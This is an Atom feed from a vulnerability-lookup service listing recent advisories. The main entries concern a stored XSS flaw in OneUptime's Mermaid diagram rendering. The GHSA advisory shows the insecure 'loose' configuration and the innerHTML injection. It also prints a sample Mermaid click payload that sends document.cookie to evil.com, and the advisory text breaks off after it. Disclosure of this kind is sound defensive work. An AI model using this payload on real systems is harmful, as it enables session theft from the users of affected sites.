<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-06T04:53:02.568382+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-276047</id>
    <title>EUVD-2026-276047</title>
    <updated>2026-10-06T04:53:02.619504+00:00</updated>
    <content>EUVD-2026-276047</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-276047"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2026-32308</id>
    <title>fkie_cve-2026-32308</title>
    <updated>2026-10-06T04:53:02.619551+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>OneUptime is a solution for monitoring and managing online services. Prior to 10.0.23, the Markdown viewer component renders Mermaid diagrams with securityLevel: "loose" and injects the SVG output via innerHTML. This configuration explicitly allows interactive event bindings in Mermaid diagrams, enabling XSS through Mermaid's click directive which can execute arbitrary JavaScript. Any field that renders markdown (incident descriptions, status page announcements, monitor notes) is vulnerable. This vulnerability is fixed in 10.0.23.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2026-32308"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-wvh5-6vjm-23qh</id>
    <title>GHSA-wvh5-6vjm-23qh — OneUptime: Stored XSS via Mermaid Diagram Rendering (securityLevel: "loose")</title>
    <updated>2026-10-06T04:53:02.619598+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> npm: oneuptime</p>
<p>### Summary</p>
<p>The Markdown viewer component renders Mermaid diagrams with `securityLevel: "loose"` and injects the SVG output via `innerHTML`. This configuration explicitly allows interactive event bindings in Mermaid diagrams, enabling XSS through Mermaid's `click` directive which can execute arbitrary JavaScript. Any field that renders markdown (incident descriptions, status page announcements, monitor notes) is vulnerable.</p>
<p>### Details</p>
<p>**Mermaid configuration — `Common/UI/Components/Markdown.tsx/MarkdownViewer.tsx:76`:**</p>
<p>```typescript
// MarkdownViewer.tsx:76
mermaid.initialize({
    securityLevel: "loose",  // Allows interactive event bindings
    // ...
});
```</p>
<p>The Mermaid documentation explicitly warns: `securityLevel: "loose"` allows click events and other interactive bindings in diagrams. The safe default is `"strict"` which strips all interactivity.</p>
<p>**SVG injection via innerHTML — `MarkdownViewer.tsx:106`:**</p>
<p>```typescript
// MarkdownViewer.tsx:106
if (containerRef.current) {
    containerRef.current.innerHTML = svg;  // Raw SVG injection
}
```</p>
<p>After Mermaid renders the diagram to SVG, the SVG string is injected directly into the DOM via `innerHTML`. Combined with `securityLevel: "loose"`, this allows event handlers embedded in the SVG to execute.</p>
<p>**Mermaid XSS payload:**</p>
<p>```markdown
```mermaid
graph TD
    A["Click me"]
    click A callback "javascript:fetch('https://evil.com/?c='+document.cookie)"
```​
```</p>
<p>With `securityLevel: "loose"`, Mermaid processes th…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-wvh5-6vjm-23qh"/>
  </entry>
</feed>
